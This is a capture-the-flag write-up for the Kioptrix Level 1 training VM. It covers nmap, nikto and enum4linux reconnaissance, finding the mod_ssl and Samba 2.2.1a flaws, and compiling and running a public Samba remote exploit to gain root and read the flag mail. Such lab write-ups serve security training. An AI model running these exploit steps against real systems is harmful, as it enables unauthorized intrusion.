Kioptrix: Level 1

This is my writeup for the Kioptrix Level 1 VM from It's considered as easy. The object of the game is to acquire root access via any means possible. There are more ways then one to successfully complete the challenges.

Intelligence Gathering

Let's do a nmap_fast scan.


We now have a list of ports. When we access the IP of the VM on port 80, we see a test page for the Apache Web Server.


Let's see what nikto finds on this webserver.



One interesting part is a vulnerability in mod_ssl which may allow a remote shell:

mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell., OSVDB-756.

Asking google for "OSVDB-756" returns a lot of results regarding OpenFuck which targets mod_ssl. Even a step-by-step guide to update the old exploit to work with the newer library files for OpenSSL. We need to change the link to the exploit as well.


From the nmap scan we can see, samba runs on port 139.
Let's have a closer look:
When running enum4linux we get to know that Samba 2.2.1a is installed.

[+] Got OS info for from smbclient: Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
[+] Got OS info for from srvinfo:
	KIOPTRIX       Wk Sv PrQ Unx NT SNT Samba Server
	platform_id     :	500
	os version      :	4.5
	server type     :	0x9a03

We use searchsploit to find exploits for this version.

$ searchsploit samba 2.2



After updating the exploit, we run it against our victim.


The flag is located in one of the mails for root:

$ mail 

Message 1:
From root  Sat Sep 26 11:42:10 2009
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <root@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...


Let's use the RCE exploit. First we copy the exploit to our working directory:

$ cp /usr/share/exploitdb/platforms/linux/remote/10.c exploit.c

Next we need to compile it and make it executable:

$ gcc -o samba_exploit exploit.c
$ chmod +x samba_exploit

Then we run the exploit against our victim (-b is platform selection):

$ ./samba_exploit -b 0 __IP__


Kioptrix: Level 1 is good to step into scanning and running prewritten exploits.